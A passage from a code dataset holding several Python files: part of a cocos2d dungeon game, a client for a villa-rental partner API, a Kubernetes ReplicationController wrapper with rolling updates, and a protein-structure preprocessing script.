self.__move(Direction.west)\n\n def right(self):\n self.__move(Direction.east)\n\n def get_pos(self):\n return self.position\n\n def append_action(self, action):\n if self.__action:\n self.__action = self.__action + action\n else:\n self.__action = action\n\n def idle(self):\n action = cocos.actions.interval_actions.ScaleTo(MONSTER_IDLE, ACTION_TIME/2)\n action = action + cocos.actions.interval_actions.ScaleTo(1., ACTION_TIME/2)\n self.append_action(action)\n\n def go(self):\n if self.__action:\n self.do(self.__action)\n self.__action = None\n\n def update(self):\n pass\n\n\nclass Hero(cocos.sprite.Sprite):\n\n def __init__(self):\n hero_image = pyglet.image.load(HERO_IMAGES_PATHS[Direction.north])\n super().__init__(hero_image, (0, 0), anchor=(0, -TILE_SIZE[1] / 3))\n\n self.dungeon = None\n self.sens = Direction.north\n self.__action = None\n self.__actions = []\n self.__current_action = None\n\n self.__images = []\n\n self.hp = 10\n self.damage = 0\n\n self.__moves = {\n Direction.north: cocos.actions.MoveBy((0, TILE_SIZE[1]), ACTION_TIME),\n Direction.south: cocos.actions.MoveBy((0, -TILE_SIZE[1]), ACTION_TIME),\n Direction.west: cocos.actions.MoveBy((-TILE_SIZE[0], 0), ACTION_TIME),\n Direction.east: cocos.actions.MoveBy((TILE_SIZE[0], 0), ACTION_TIME),\n }\n\n\n def __append_action(self, action):\n if self.__action:\n self.__action = self.__action + action\n else:\n self.__action = action\n\n def __change_image(self):\n image = self.__images.pop(0)\n self.image = image\n\n def __accept_keys(self):\n self.dungeon.accept_key = True\n\n def get_pos(self):\n return self.dungeon.hero_position\n\n def is_tile_free(self):\n return self.dungeon.is_tile_free(self.sens)\n\n def is_at_goal(self):\n return self.dungeon.is_at_goal()\n\n def move(self):\n if self.dungeon.hero_move(self.sens):\n action = self.__moves[self.sens]\n self.__append_action(action)\n self.__append_action(\n cocos.actions.instant_actions.CallFunc(self.__accept_keys))\n game_update(self, self.dungeon.monsters)\n self.dungeon.monsters_moves()\n\n def turn_right(self):\n if self.sens == Direction.north:\n self.sens = Direction.east\n elif self.sens == Direction.east:\n self.sens = Direction.south\n elif self.sens == Direction.south:\n self.sens = Direction.west\n else:\n self.sens = Direction.north\n\n image = pyglet.image.load(HERO_IMAGES_PATHS[self.sens])\n self.__images.append(image)\n action = cocos.actions.instant_actions.CallFunc(self.__change_image)\n action += cocos.actions.instant_actions.CallFunc(self.__accept_keys)\n self.__append_action(action)\n\n def turn_left(self):\n if self.sens == Direction.north:\n self.sens = Direction.west\n elif self.sens == Direction.east:\n self.sens = Direction.north\n elif self.sens == Direction.south:\n self.sens = Direction.east\n else:\n self.sens = Direction.south\n\n image = pyglet.image.load(HERO_IMAGES_PATHS[self.sens])\n self.__images.append(image)\n action = cocos.actions.instant_actions.CallFunc(self.__change_image)\n action += cocos.actions.instant_actions.CallFunc(self.__accept_keys)\n self.__append_action(action)\n\n def go(self):\n if self.__action:\n self.dungeon.accept_key = False\n self.do(self.__action)\n self.__action = None\n\n\nclass DungeonTileSet(cocos.tiles.TileSet):\n\n def __init__(self):\n super(DungeonTileSet, self).__init__(id=0, properties={})\n\n ground_image = pyglet.image.load(GROUND_IMAGE_PATH)\n glTexParameteri(ground_image.texture.target, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameteri(ground_image.texture.target, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n\n obstacle_image = pyglet.image.load(OBSTACLE_IMAGE_PATH)\n glTexParameteri(obstacle_image.texture.target, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameteri(obstacle_image.texture.target, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n\n goal_image = pyglet.image.load(GOAL_IMAGE_PATH)\n glTexParameteri(goal_image.texture.target, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameteri(goal_image.texture.target, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n\n ground_properties = {'obstacle': False, 'goal': False}\n obstacle_properties = {'obstacle': True, 'goal': False}\n goal_properties = {'obstacle': False, 'goal': True}\n\n self.add(ground_properties, ground_image, GROUND)\n self.add(obstacle_properties, obstacle_image, OBSTACLE)\n self.add(goal_properties, goal_image, GOAL)\n\n\nclass Game(cocos.scene.Scene):\n\n def __init__(self, dungeon_size):\n window = cocos.director.director.init(\n width=SCREEN_SIZE[0], height=SCREEN_SIZE[1], autoscale=True, caption='Level 1')\n window.set_size(SCREEN_SIZE[0]*SCALE_FACTOR, SCREEN_SIZE[1]*SCALE_FACTOR)\n\n super(Game, self).__init__()\n self.dungeon = Dungeon(dungeon_size)\n\n # layer initialisation\n self.character_layer = cocos.layer.Layer()\n self.add(self.dungeon)\n self.add(self.character_layer)\n\n # character initialisation\n self.hero = Hero()\n self.character_layer.add(self.hero)\n self.dungeon.add_hero(self.hero)\n\n def add_pickup(self, pickup, position):\n self.character_layer.add(pickup)\n self.dungeon.add_pickup(pickup, position)\n\n def add_monster(self, monster, position):\n self.character_layer.add(monster)\n self.dungeon.add_monster(monster, position)\n\n def draw(self, *args, **kwargs):\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n super().draw(*args, **kwargs)\n\n def set_view(self, screen_size):\n\n self.dungeon.set_view()\n center = (int(screen_size[0] / 2), int(screen_size[1] / 2))\n dungeon_size = self.dungeon.dungeon_size\n\n origin = (\n center[0] - int(dungeon_size[0] / 2 * TILE_SIZE[0]),\n int(center[1] - dungeon_size[1] / 2 * TILE_SIZE[1]))\n\n self.position = origin\n\n def run(self):\n self.set_view(SCREEN_SIZE)\n cocos.director.director.run(self)\n\n\nclass Dungeon(cocos.tiles.RectMapLayer):\n\n is_event_handler = True\n\n def __init__(self, dungeon_size):\n self.dungeon_size = dungeon_size\n\n self.__cells = []\n self.tiles = []\n self.tileset = DungeonTileSet()\n\n self.__build()\n # self.__build_maze()\n self.__apply_tileset()\n\n self.hero = None\n self.hero_position = None\n self.monsters = []\n self.monsters_position = []\n self.pickups = []\n self.pickups_position = []\n\n self.accept_key = True\n\n super(Dungeon, self).__init__('dungeon', TILE_SIZE[0], TILE_SIZE[1], self.__cells)\n\n def update_monster_position(self):\n self.monsters_position = []\n for monster in self.monsters:\n self.monsters_position.append(monster.dungeon_position)\n\n def monsters_moves(self):\n for monster in self.monsters:\n if monster.new_action:\n monster.append_action(monster.new_action)\n monster.new_action = None\n else:\n monster.idle()\n monster.go()\n\n def add_monster(self, monster, position):\n self.monsters_position.append(position)\n monster.dungeon_position = position\n monster.position = position[0] * TILE_SIZE[0] + TILE_SIZE[0]/2, position[1] * TILE_SIZE[1]\n self.monsters .append(monster)\n monster.dungeon = self\n\n\n def add_pickup(self, pickup, position):\n self.pickups_position.append(position)\n pickup.dungeon_position = position\n pickup.position = position[0] * TILE_SIZE[0] + TILE_SIZE[0]/2, position[1] * TILE_SIZE[1]\n self.pickups.append(pickup)\n pickup.dungeon = self\n\n def add_hero(self, hero):\n self.hero = hero\n\n self.hero.position = self.__begin_postion()\n self.hero_position = self.dungeon_size[0] - 2, 1\n hero.dungeon = self\n\n def __build_maze(self):\n self.__cells = []\n\n maze = Maze(*self.dungeon_size)\n self.dungeon_size = (maze.size_x, maze.size_y)\n\n for x in range(self.dungeon_size[0]):\n column = []\n cells_column = []\n for y in range(self.dungeon_size[1]):\n if x == 1 and y == self.dungeon_size[1] - 2:\n column.append(GOAL)\n elif maze.cells[x][y] == 1:\n column.append(OBSTACLE)\n else:\n column.append(GROUND)\n cells_column.append(None)\n\n self.__cells.append(cells_column)\n self.tiles.append(column)\n\n def __build(self):\n self.__cells = []\n\n for x in range(self.dungeon_size[0]):\n column = []\n cells_column = []\n for y in range(self.dungeon_size[1]):\n if x == 0 or x == self.dungeon_size[0] - 1 \\\n or y == 0 or y == self.dungeon_size[1] - 1:\n column.append(OBSTACLE)\n elif x == 1 and y == self.dungeon_size[1] - 2:\n column.append(GOAL)\n elif (y+x) % 3 == 0 and x % 2 == 0 and x != self.dungeon_size[0] - 2 \\\n or x == 1 and y == self.dungeon_size[1] - 5 and y != 1:\n column.append(OBSTACLE)\n else:\n column.append(GROUND)\n cells_column.append(None)\n\n self.__cells.append(cells_column)\n self.tiles.append(column)\n\n def __apply_tileset(self):\n for x in range(self.dungeon_size[0]):\n for y in range(self.dungeon_size[1]):\n self.__cells[x][y] = cocos.tiles.RectCell(\n x, y, TILE_SIZE[0], TILE_SIZE[1], {}, self.tileset[self.tiles[x][y]])\n\n def __begin_postion(self):\n x, y = self.dungeon_size[0] - 2, 1\n return x * TILE_SIZE[0], y * TILE_SIZE[1]\n\n def __monster_in_position(self, position):\n\n if position in self.monsters_position:\n return True\n return False\n\n def __pickup_in_position(self, position):\n\n if position in self.pickups_position:\n return True\n return False\n\n def __tile_properties(self, position):\n x, y = position\n return self.tileset[self.tiles[x][y]].properties\n\n def set_view(self):\n\n super(Dungeon, self).set_view(\n 0,\n 0,\n self.dungeon_size[0] * TILE_SIZE[0],\n self.dungeon_size[1] * TILE_SIZE[1])\n\n def hero_move(self, move):\n\n new_position = self.hero_position[0] + move[0], self.hero_position[1] + move[1]\n if self.__tile_properties(new_position)[OBSTACLE]:\n return False\n elif self.__monster_in_position(new_position):\n for index, position in enumerate(self.monsters_position):\n if position == new_position:\n monster = self.monsters[index]\n monster.hp -= self.hero.damage\n self.hero.hp -= monster.damage\n return False\n elif self.__pickup_in_position(new_position):\n for index, position in enumerate(self.pickups_position):\n if position == new_position:\n self.pickups[index].grab()\n self.pickups[index].kill()\n del self.pickups_position[index]\n del self.pickups[index]\n self.hero_position = new_position\n return True \n else:\n self.hero_position = new_position\n return True\n\n def is_position_open(self, position):\n if self.__tile_properties(position)[OBSTACLE]:\n return False\n elif self.__monster_in_position(position):\n return False\n elif self.__pickup_in_position(position):\n return False\n else:\n return True \n\n def is_tile_free(self, move):\n new_position = self.hero_position[0] + move[0], self.hero_position[1] + move[1]\n\n if self.__tile_properties(new_position)[OBSTACLE]:\n return False\n elif self.__monster_in_position(new_position):\n return False\n else:\n return True\n\n def is_tile_free_monster(self, position):\n\n if self.__tile_properties(position)[OBSTACLE]:\n return False\n elif self.__monster_in_position(position):\n return False\n else:\n return True\n\n def is_at_goal(self):\n if self.__tile_properties(self.hero_position)[GOAL]:\n return True\n else:\n return False\n\n def on_key_press (self, key, modifiers):\n \"\"\"This function is called when a key is pressed.\n 'key' is a constant indicating which key was pressed.\n 'modifiers' is a bitwise or of several constants indicating which\n modifiers are active at the time of the press (ctrl, shift,\n capslock, etc.)\n \"\"\"\n\n if self.accept_key:\n game_on_key_press(key, modifiers, self.hero)\n self.hero.go()\n","sub_path":"Exercices/Dungeon_Monters/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":17615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"256728421","text":"import datetime\nfrom urllib.parse import (urljoin, urlparse, parse_qs, urlencode, urlunparse)\nfrom urllib.request import (urlopen)\nfrom posixpath import join as posixjoin\nfrom xml.etree import ElementTree as ET\n\nclass MarketingVillasUrls(object):\n # Base Components\n BASE_URL = \"http://ws.marketingvillas.com/\"\n BASE_PATH = \"/partners.asmx\"\n\n # Individual API Paths\n TIME_TOKEN_ENDPOINT = (\"/Security_GetTimeToken\", [],)\n MD5_TOKEN_ENDPOINT = (\"/Security_GetMD5Hash\", [\"p_ToHash\"],)\n VILLA_LIST_ENDPOINT = (\"/getMVLVillaList\", [\"p_Token\", \"p_UserID\"],)\n VILLA_RATES_ENDPOINT = (\"/getVillaRates\", [\"p_Token\", \"p_UserID\", \"p_VillaID\"],)\n\n\nclass MarketingVillasApi(object):\n \"\"\"\n This class encapsulates the MarketingVillas API.\n\n Each API endpoint is associated with two methods of this class, both of\n which share a similar name to the API endpoint that they work with:\n \n 1.) A public method intended for general use, which returns the data\n retrieved from the endpoint in a nominally user/code-friendly\n format specific to that endpoint (e.g. a dictionary, or a plain\n string).\n\n 2.) A private method intended for internal and specialist use, which\n does nothing more than make a call to the API with the right\n parameters, returning the bytes content of the response as-is\n (typically containing XML-formatted data). These private methods\n bear the same signature as their public counterparts, except the\n method identifier is prefixed with a single underscore.\n \"\"\"\n\n def __init__(self, user_id: str, password: str):\n self.user_id = user_id\n self.password = password\n\n\n # Utilities and common operations\n\n @classmethod\n def _construct_endpoint(cls, endpoint: tuple, get_params: dict={}) -> str:\n \"\"\"\n This function handles construction of API endpoints to be used for\n making HTTP requests. Combined with the `MarketingVillasUrls`, this\n function also verifies that the required GET parameters are being passed.\n \"\"\"\n path = endpoint[0]\n param_keys = endpoint[1]\n\n # Verify required keys are provided\n for key in param_keys:\n if key not in get_params:\n raise KeyError(key)\n\n joined_endpoint = urljoin(MarketingVillasUrls.BASE_URL, posixjoin(MarketingVillasUrls.BASE_PATH, path.lstrip(\"/\")))\n parsed_endpoint = urlparse(joined_endpoint)\n query_string = urlencode(get_params)\n result = urlunparse(parsed_endpoint._replace(query=query_string))\n return result\n\n @classmethod\n def _make_request(cls, url: str) -> bytes:\n with urlopen(url) as response:\n content = response.read()\n return content\n\n @classmethod\n def _raw_bytes_to_tree(cls, raw: bytes) -> ET.ElementTree:\n return ET.fromstring(raw.decode(\"utf8\"))\n\n\n # API endpoints wrapped in member functions\n\n def _get_time_token(self) -> bytes:\n request_uri = self._construct_endpoint(MarketingVillasUrls.TIME_TOKEN_ENDPOINT, {})\n resp = self._make_request(request_uri)\n return resp\n\n def get_time_token(self) -> str:\n tree = self._raw_bytes_to_tree(self._get_time_token())\n time_token = tree.text\n return time_token\n\n def _get_md5_token(self) -> bytes:\n tohash = \"|\".join( [self.user_id, self.password, self.get_time_token()] )\n request_uri = self._construct_endpoint(MarketingVillasUrls.MD5_TOKEN_ENDPOINT,\n {\n \"p_ToHash\": tohash\n })\n resp = self._make_request(request_uri)\n return resp\n\n def get_md5_token(self) -> str:\n tree = self._raw_bytes_to_tree(self._get_md5_token())\n md5_token = tree.text\n return md5_token\n\n def _get_villa_list(self) -> bytes:\n request_uri = self._construct_endpoint(MarketingVillasUrls.VILLA_LIST_ENDPOINT,\n {\n \"p_Token\": self.get_md5_token(),\n \"p_UserID\": self.user_id\n })\n resp = self._make_request(request_uri)\n return resp\n\n def get_villa_list(self) -> list:\n tree = self._raw_bytes_to_tree(self._get_villa_list())\n villas_element = tree\n villas_children = villas_element.getchildren()\n villas_list = [ {\n \"villa_id\": villa.attrib[\"villaid\"],\n \"sort_name\": villa.attrib[\"sortname\"],\n \"base_url\": villa.attrib[\"baseurl\"],\n \"name\": villa.text\n } for villa in villas_children ]\n return villas_list\n\n def _get_villa_rates(self, villa_id: str) -> bytes:\n request_uri = self._construct_endpoint(MarketingVillasUrls.VILLA_RATES_ENDPOINT,\n {\n \"p_Token\": self.get_md5_token(),\n \"p_UserID\": self.user_id,\n \"p_VillaID\": villa_id\n })\n return self._make_request(request_uri)\n\n def get_villa_rates(self, villa_id: str) -> dict:\n\n def parse_date(datestr):\n return datetime.datetime.strptime(datestr, \"%Y-%m-%dT00:00:00\")\n\n tree = self._raw_bytes_to_tree(self._get_villa_rates(villa_id))\n rates_element = tree.getchildren()[0]\n rates_children = rates_element.getchildren()\n villa_rates_obj = {\n \"villa_id\": villa_id,\n \"rate_name\": rates_children[0].text,\n \"rates\": [ {\n \"from\": parse_date(rate.find(\"From\").text),\n \"to\": parse_date(rate.find(\"To\").text),\n \"amount\": float(rate.find(\"Amount\").text),\n \"min_stay\": int(rate.find(\"MinimumNightStay\").text),\n \"percent_tax\": float(rate.find(\"PercentTax\").text),\n \"percent_rate\": float(rate.find(\"PercentRate\").text)\n } for rate in rates_children[1:] ]\n }\n return villa_rates_obj\n\n","sub_path":"pymvlapi/endpoint.py","file_name":"endpoint.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"263410835","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#\n# This file is subject to the terms and conditions defined in\n# file 'LICENSE.md', which is part of this source code package.\n#\n\nimport uuid\nimport copy\nimport time\nfrom kubernetes import K8sConfig\nfrom kubernetes.K8sPodBasedObject import K8sPodBasedObject\nfrom kubernetes.K8sPod import K8sPod\nfrom kubernetes.K8sContainer import K8sContainer\nfrom kubernetes.models.v1.ReplicationController import ReplicationController\nfrom kubernetes.K8sExceptions import *\n\nSCALE_WAIT_TIMEOUT_SECONDS = 60\n\n\nclass K8sReplicationController(K8sPodBasedObject):\n\n def __init__(self, config=None, name=None, image=None, replicas=0):\n super(K8sReplicationController, self).__init__(config=config, obj_type='ReplicationController', name=name)\n\n self.model = ReplicationController(name=name, namespace=self.config.namespace)\n self.set_replicas(replicas)\n\n rc_version = str(uuid.uuid4())\n self.model.add_pod_label(k='rc_version', v=rc_version)\n selector = {'name': name, 'rc_version': rc_version}\n self.set_selector(selector)\n\n if image is not None:\n container = K8sContainer(name=name, image=image)\n self.add_container(container)\n self.model.set_pod_name(name=name)\n\n if self.config.pull_secret is not None:\n self.add_image_pull_secrets(name=self.config.pull_secret)\n\n # ------------------------------------------------------------------------------------- override\n\n def create(self):\n super(K8sReplicationController, self).create()\n self.get()\n self.wait_for_replicas(self.get_replicas())\n return self\n\n def update(self):\n super(K8sReplicationController, self).update()\n self.get()\n return self\n\n # ------------------------------------------------------------------------------------- add\n\n def add_annotation(self, k=None, v=None):\n self.model.add_annotation(k=k, v=v)\n return self\n\n def add_label(self, k=None, v=None):\n self.model.add_label(k=k, v=v)\n return self\n\n def add_pod_annotation(self, k=None, v=None):\n self.model.add_pod_annotation(k=k, v=v)\n return self\n\n def add_pod_label(self, k=None, v=None):\n self.model.add_pod_label(k=k, v=v)\n return self\n\n # ------------------------------------------------------------------------------------- del\n\n def del_annotation(self, k=None):\n self.model.del_annotation(k=k)\n return self\n\n def del_label(self, k=None):\n self.model.del_label(k=k)\n return self\n\n def del_pod_annotation(self, k=None):\n self.model.del_pod_annotation(k=k)\n return self\n\n def del_pod_label(self, k=None):\n self.model.del_pod_label(k=k)\n return self\n\n # ------------------------------------------------------------------------------------- get\n\n def get(self):\n self.model = ReplicationController(model=self.get_model())\n return self\n\n def get_annotation(self, k=None):\n return self.model.get_annotation(k=k)\n\n def get_annotations(self):\n return self.model.get_annotations()\n\n def get_label(self, k=None):\n return self.model.get_label(k=k)\n\n def get_labels(self):\n return self.model.get_labels()\n\n def get_namespace(self):\n return self.model.get_namespace()\n\n def get_pod_annotation(self, k=None):\n return self.model.get_pod_annotation(k=k)\n\n def get_pod_annotations(self):\n return self.model.get_pod_annotations()\n\n def get_pod_label(self, k=None):\n return self.model.get_pod_label(k=k)\n\n def get_pod_labels(self):\n return self.model.get_pod_labels()\n\n def get_replicas(self):\n return self.model.get_replicas()\n\n def get_selector(self):\n return self.model.get_selector()\n\n # ------------------------------------------------------------------------------------- set\n\n def set_annotations(self, dico=None):\n self.model.set_annotations(dico=dico)\n return self\n\n def set_labels(self, dico=None):\n self.model.set_labels(dico=dico)\n return self\n\n def set_namespace(self, name=None):\n self.model.set_namespace(name=name)\n return self\n\n def set_pod_annotations(self, dico=None):\n self.model.set_pod_annotations(new_dict=dico)\n return self\n\n def set_pod_labels(self, dico=None):\n self.model.set_pod_labels(labels=dico)\n return self\n\n def set_replicas(self, replicas=None):\n self.model.set_replicas(replicas=replicas)\n return self\n\n def set_selector(self, dico=None):\n self.model.set_selector(dico=dico)\n return self\n\n # ------------------------------------------------------------------------------------- wait for replicas\n\n def wait_for_replicas(self, replicas=None, labels=None):\n if replicas is None:\n raise SyntaxError('ReplicationController: replicas: [ {0} ] cannot be None.'.format(replicas))\n if not isinstance(replicas, int) or replicas < 0:\n raise SyntaxError('ReplicationController: replicas: [ {0} ] must be a positive integer.'.format(replicas))\n\n if labels is None:\n labels = self.get_pod_labels()\n\n name = labels.get('name', None)\n pod_list = list()\n pod_qty = len(pod_list)\n ready_check = False\n start_time = time.time()\n\n print('Waiting for replicas to scale to: [ {0} ] with labels: [ {1} ]'.format(replicas, labels))\n\n while not ((pod_qty == replicas) and ready_check):\n pod_list = self._get_pods(name=name, labels=labels)\n pod_qty = len(pod_list)\n if replicas > 0:\n pods_ready = 0\n for pod in pod_list:\n assert isinstance(pod, K8sPod)\n try:\n if pod.is_ready():\n pods_ready += 1\n except NotFoundException:\n # while scaling down\n pass\n if pods_ready >= len(pod_list):\n ready_check = True\n else:\n ready_check = True\n\n elapsed_time = time.time() - start_time\n if elapsed_time >= SCALE_WAIT_TIMEOUT_SECONDS: # timeout\n raise TimedOutException(\"Timed out scaling replicas to: [ {0} ] with labels: [ {1} ]\".format(replicas, labels))\n\n time.sleep(0.2)\n return self\n\n def _get_pods(self, name=None, labels=None):\n if labels is None:\n return K8sPod.get_by_name(config=self.config, name=name)\n else:\n return K8sPod.get_by_labels(config=self.config, labels=labels)\n\n # ------------------------------------------------------------------------------------- get by name\n\n @staticmethod\n def get_by_name(config=None, name=None):\n if name is None:\n raise SyntaxError('ReplicationController: name: [ {0} ] cannot be None.'.format(name))\n if not isinstance(name, str):\n raise SyntaxError('ReplicationController: name: [ {0} ] must be a string.'.format(name))\n\n if config is not None and not isinstance(config, K8sConfig):\n raise SyntaxError('ReplicationController: config: [ {0} ] must be a K8sConfig'.format(config))\n\n rc_list = list()\n data = {'labelSelector': 'name={0}'.format(name)}\n rcs = K8sReplicationController(config=config, name=name).get_with_params(data=data)\n\n for rc in rcs:\n try:\n rc_name = ReplicationController(model=rc).get_name()\n rc_list.append(K8sReplicationController(config=config, name=rc_name).get())\n except NotFoundException:\n pass\n\n return rc_list\n\n # ------------------------------------------------------------------------------------- resize\n\n @staticmethod\n def resize(config=None, name=None, replicas=None):\n if name is None:\n raise SyntaxError('ReplicationController: name: [ {0} ] cannot be None.'.format(name))\n if replicas is None:\n raise SyntaxError('ReplicationController: replicas: [ {0} ] cannot be None.'.format(replicas))\n\n if not isinstance(name, str):\n raise SyntaxError('ReplicationController: name: [ {0} ] must be a string.'.format(name))\n\n if not isinstance(replicas, int) or replicas < 0:\n raise SyntaxError('ReplicationController: replicas: [ {0} ] must be a positive integer.'.format(replicas))\n\n if config is not None and not isinstance(config, K8sConfig):\n raise SyntaxError('ReplicationController: config: [ {0} ] must be a K8sConfig'.format(config))\n\n current_rc = K8sReplicationController(config=config, name=name).get()\n current_rc.set_replicas(replicas)\n current_rc.update()\n current_rc.wait_for_replicas(replicas=replicas)\n\n return current_rc\n\n # ------------------------------------------------------------------------------------- rolling update\n\n @staticmethod\n def rolling_update(config=None, name=None, image=None, container_name=None, rc_new=None, wait_seconds=10):\n \"\"\"\n Performs a simple rolling update of a ReplicationController.\n\n See https://github.com/kubernetes/kubernetes/blob/release-1.0/docs/design/simple-rolling-update.md\n for algorithm details.\n\n :param config: An instance of K8sConfig. If omitted, reads from ~/.kube/config.\n :param name: The name of the ReplicationController we want to update.\n :param image: The updated image version we want applied.\n :param container_name: The name of the container we're targeting for the update.\n Required if more than one container is present.\n :param rc_new: An instance of K8sReplicationController with the new configuration to apply.\n Mutually exclusive with [image, container_name] if specified.\n :param wait_seconds:\n\n :return:\n \"\"\"\n\n if name is None:\n raise SyntaxError('K8sReplicationController: name: [ {0} ] cannot be None.'.format(name))\n if image is None and rc_new is None:\n raise SyntaxError(\"K8sReplicationController: please specify either 'image' or 'rc_new'\")\n if name is not None and image is not None and rc_new is not None:\n raise SyntaxError('K8sReplicationController: rc_new is mutually exclusive with a [image, container_name] pair.')\n\n phase = 'init'\n ann_update_partner = 'update-partner'\n ann_desired_replicas = 'desired-replicas'\n\n name_next = \"{0}-next\".format(name)\n\n rc_current = None\n rc_next = None\n rc_current_exists = False\n rc_next_exists = False\n\n try:\n rc_current = K8sReplicationController(config=config, name=name).get()\n rc_current_exists = True\n except NotFoundException:\n pass\n\n try:\n rc_next = K8sReplicationController(config=config, name=name_next).get()\n rc_next_exists = True\n except NotFoundException:\n pass\n\n if not rc_current_exists and not rc_next_exists:\n raise NotFoundException('K8sReplicationController: rc: [ {0} ] does not exist.'.format(name))\n\n if rc_current_exists and not rc_next_exists:\n\n if rc_new is not None:\n rc_next = rc_new\n rc_next.add_annotation(k=ann_desired_replicas, v=str(rc_current.get_replicas()))\n\n else:\n rc_next = copy.deepcopy(rc_current)\n rc_next.add_annotation(k=ann_desired_replicas, v=str(rc_current.get_replicas()))\n\n if len(rc_next.model.pod_spec.containers) > 1 and not container_name:\n raise UnprocessableEntityException('K8sReplicationController: unable to determine on which container to perform a rolling_update; please specify the target container_name.')\n if len(rc_next.model.pod_spec.containers) == 1 and not container_name:\n container_name = rc_next.model.pod_spec.containers[0].model['name']\n\n rc_next.set_container_image(name=container_name, image=image)\n\n my_version = str(uuid.uuid4())\n\n rc_next.set_name(name=name_next)\n rc_next.add_pod_label(k='name', v=name)\n rc_next.add_pod_label(k='rc_version', v=my_version)\n rc_next.set_selector(dico=dict(name=name, rc_version=my_version))\n rc_next.set_replicas(replicas=0)\n rc_next.set_pod_generate_name(mode=True, name=name)\n rc_next.create()\n\n rc_current.add_annotation(k=ann_update_partner, v=name_next)\n rc_current.update()\n\n phase = 'rollout'\n\n elif rc_next_exists and not rc_current_exists:\n phase = 'rename'\n\n elif rc_current_exists and rc_next_exists:\n if not rc_next.get_annotation(k=ann_desired_replicas):\n rc_next.add_annotation(k=ann_desired_replicas, v=rc_current.get_replicas())\n rc_next.update()\n phase = 'rollout'\n\n if phase == 'rollout':\n desired_replicas = rc_next.get_annotation(k=ann_desired_replicas)\n\n while rc_next.get_replicas() < int(desired_replicas):\n\n next_replicas = rc_next.get_replicas() + 1\n rc_next.set_replicas(replicas=next_replicas)\n rc_next.update()\n rc_next.wait_for_replicas(replicas=next_replicas, labels=rc_next.get_pod_labels())\n time.sleep(wait_seconds)\n\n if rc_current.get_replicas() > 0:\n current_replicas = rc_current.get_replicas() - 1\n rc_current.set_replicas(replicas=current_replicas)\n rc_current.update()\n rc_current.wait_for_replicas(replicas=current_replicas, labels=rc_current.get_pod_labels())\n\n if rc_current.get_replicas() > 0:\n rc_current.set_replicas(replicas=0)\n rc_current.update()\n rc_current.wait_for_replicas(replicas=0, labels=rc_current.get_pod_labels())\n\n phase = 'rename'\n\n if phase == 'rename':\n rc_current.delete()\n rc_current = copy.deepcopy(rc_next)\n rc_current.set_name(name=name)\n rc_current.del_annotation(k=ann_update_partner)\n rc_current.del_annotation(k=ann_desired_replicas)\n rc_current.create()\n rc_next.delete()\n\n return rc_current\n","sub_path":"kubernetes/K8sReplicationController.py","file_name":"K8sReplicationController.py","file_ext":"py","file_size_in_byte":14666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"633819053","text":"import argparse\r\nimport os\r\nimport numpy as np\r\nimport process\r\nimport geo\r\nimport pathlib\r\n\r\nROOT = '/home/eric/DeepPBS/data'\r\nOUT = '/share/Data/processed'\r\ndataset = 'test'\r\nPATH = os.path.join(ROOT, dataset)\r\npathlib.Path(PATH).mkdir(parents=True, exist_ok=True)\r\n\r\n\r\ndef run(filename):\r\n coo = np.load(os.path.join(PATH, 'coo', '%s.npy' % filename))\r\n with open(os.path.join(PATH, 'seq', '%s.txt' % filename)) as f:\r\n seq = f.read()\r\n\r\n comp_ary = process.ImageStrucRep(\r\n coo[1::4], seq, center='ca', multiview=True)\r\n np.save(os.path.join(OUT, dataset, 'comp_image_ca_multiview',\r\n filename + '.npy'), comp_ary)\r\n\r\n # knn = process.KNNStrucRep(coo[1::4], seq)\r\n # np.save(os.path.join(PATH, 'KNN', '%s.npy' % filename), knn)\r\n\r\n # tor = process.coo2tor(coo)\r\n # sincos = process.tor2sincos(tor)\r\n # np.save(os.path.join(PATH, 'tor', '%s.npy' % filename), sincos)\r\n\r\n # tor = np.load(os.path.join(PATH, 'tor', '%s.npy' % filename))\r\n # tor = process.sincos2tor(tor)\r\n # coo_ = process.tor2coo(tor, coo[1::4])\r\n # rmsd_n = np.sqrt(\r\n # np.mean(np.square(geo.get_len(coo[::4][1:] - coo_[3::4]))))\r\n # rmsd_c = np.sqrt(\r\n # np.mean(np.square(geo.get_len(coo[2::4][:-1] - coo_[1::4]))))\r\n # rmsd_o = np.sqrt(\r\n # np.mean(np.square(geo.get_len(coo[3::4][:-1] - coo_[2::4]))))\r\n # norm = 1 + np.log(np.sqrt(len(coo_[3::4]) / 100))\r\n # return np.array([rmsd_n, rmsd_c, rmsd_o])/norm\r\n\r\n\r\n# parser = argparse.ArgumentParser()\r\n# parser.add_argument('--multi_process', type=bool, default=False,\r\n# help='multi process or not')\r\n# parser.add_argument('--subset', type=int, default='0',\r\n# help='subset index')\r\n# parser.add_argument('--num_worker', type=int, default='0',\r\n# help='number of worker')\r\n# argparses = parser.parse_args()\r\n\r\n# if dataset == 'nr40':\r\n# with open(os.path.join(PATH, 'filenames.txt')) as f:\r\n# filenames = f.read().split('\\n')\r\n# elif dataset == 'test':\r\n# filenames = os.listdir(os.path.join(PATH, 'coo'))\r\n# filenames = [filename[:-4] for filename in filenames]\r\n\r\n\r\n# # def drop_done(filenames, path_done):\r\n# # filenames_done = os.listdir(path_done)\r\n# # for filename in filenames_done:\r\n# # filenames.remove(filename)\r\n# # return filenames\r\n\r\n# if argparses.multi_process:\r\n# subset_size = len(filenames) / argparses.num_worker\r\n# filenames = filenames[int(argparses.subset * subset_size):int((argparses.subset + 1) * subset_size)]\r\n\r\n# for filename in filenames:\r\n# run(filename)\r\n\r\n\r\n# nrmsds = []\r\n# for filename in filenames:\r\n# coo = np.load(os.path.join(PATH, 'coo', '%s.npy' % filename))\r\n# with open(os.path.join(PATH, 'seq', 